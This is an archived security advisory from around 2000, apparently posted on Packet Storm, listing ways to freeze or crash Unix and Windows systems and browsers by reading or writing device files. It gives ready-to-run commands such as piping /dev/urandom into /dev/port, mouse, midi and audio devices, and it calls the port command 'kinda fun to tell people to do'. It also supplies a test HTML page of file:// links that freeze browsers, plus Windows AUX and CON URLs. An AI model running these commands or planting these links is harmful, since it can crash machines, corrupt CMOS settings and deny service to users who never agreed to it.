exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

readdev.txt

readdev.txt
Posted Apr 11, 2000
Authored by vade79, realhalo

Documentation on possibilities to freeze/deny service to applications and daemons via reading devices on unix/windows based operating systems. (unix note: most of these device calls don't require root, on most dists) Includes some sample html for crashing browsers through file:// links.

tags | denial of service, root
systems | windows, unix
SHA-256 | d7c8deedc35391eaa333c07710195642bccfa5468ade29076a0bcabc58fa637c

readdev.txt

Change Mirror Download
Documentation on possibilities to freeze/deny service to applications and
daemons via reading devices on unix/windows based operating systems.
(unix note: most of these device calls don't require root, on most dists)

(UNIX TEST START)
As of late, with the MS Windows device problems with /dev/dev(\dev\dev). I
thought about unix and its possibilities, so here are some of the things I came
up with. First, local executions:

(note: I used urandom to hit errors and output garbage quickly to create errors
if it was going to at all)

exec : cat /dev/urandom>/dev/port (kinda fun to tell people to do :))
result: reboot+core errors -> CMOS checksum errors.
uid : root.

exec : cat /dev/urandom>/dev/mouse OR cat /dev/urandom>/dev/gpmdata
result: mouse locked and sometimes console/output(in X) becomes un-usable.
uid : non-root/root, depends on the dist/version.

exec : cat /dev/urandom>/dev/midi
result: large amount of lag. (mouse+console)
uid : non-root/root, depends on the dist/version.

exec : cat /dev/urandom>/dev/zero
result: large amount of lag.
uid : non-root/root, depends on the dist/version.

exec : cat /dev/urandom>/dev/audio
result: send misc noise to the speakers and minimal lag.
uid : non-root/root, depends on the dist/version.

exec : cat /dev/urandom>/dev/zero OR cat /dev/zero
result: large amount of cpu usage. (similar to a fork() flood)
uid : non-root.

Of course there are others not listed, but these were the most effective of
the bundle I tried.


Now, ways to freeze/deny service to Netscape/lynx/etc.

url : file:///dev/mouse OR file:///dev/gpmdata
Netscape: random/frozen mouse+browser.
Lynx : similar results.
uid : non-root/root, depends on the dist/version.

url : file:///dev/tty? (? = number/null)
Netscape: frozen browser+output/console. (tested in X)
Lynx : frozen browser, but breakable.
uid : non-root.

url : file:///dev/stdin OR file:///dev/stdout
Netscape: frozen browser. (only with stdout)
Lynx : frozen browser.
uid : non-root.

..and so on. Here is some simple html code to test out on yourself, if desired.

-- testunixdev.html begin --
click to check unix device:<p>
device: <a href="file:///dev/mouse">mouse</a> and/or <a href="file:///dev/gpmdata">gpmdata</a>. (these should randomize/freeze the mouse(usually)+browser)<p>
device: <a href="file:///dev/audio">audio</a> and/or <a href="file:///dev/midi">midi</a>. (conflicting results)<p>
device: <a href="file:///dev/zero">zero</a> and/or <a href="file:///dev/urandom">urandom</a>. (these should just load alot garbage)<p>
device: <a href="file:///dev/stdin">stdin</a> and/or <a href="file:///dev/stdout">stdout</a>. (these should freeze the browser(stdout))<p>
device: <a href="file:///dev/tty">tty</a>, <a href="file:///dev/tty0">tty0(usually)</a>, <a href="file:///dev/tty1">tty1</a>, <a href="file:///dev/tty2">tty2</a>, <a href="file:///dev/tty3">tty3</a>, <a href="file:///dev/tty4">tty4</a>, <a href="file:///dev/tty5">tty5</a>, <a href="file:///dev/tty6">tty6</a>. (this freezes console/output, depending on tty)<p>
-- testunixdev.html end --

Or, of course, you can just list your devices and test locally -> file:///dev/.
(UNIX TEST END)


(WINDOWS TEXT START)
Also, I noticed in MS Windows similar read errors trying to access devices such
as AUX, PRN, CON, COM#, LPT# and so on. For example:

The URL "file://C:\AUX" freezes IE and often makes explorer come to a halt
in 95/98(also works on NT, but doesn't tie up the system). Also, trying to
write data to AUX(best with +63/64 bytes) freezes apps/etc. (NOTE: THIS IS
DIFFERENT THAN THE /DEV/DEV(\DEV\DEV) BLUE SCREEN EXPLOIT)

That's about it.
(WINDOWS TEXT END)


vade79 -> _v9[v9@fakehalo.org]
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    38 Files
  • 24
    Sep 24th
    65 Files
  • 25
    Sep 25th
    24 Files
  • 26
    Sep 26th
    26 Files
  • 27
    Sep 27th
    34 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close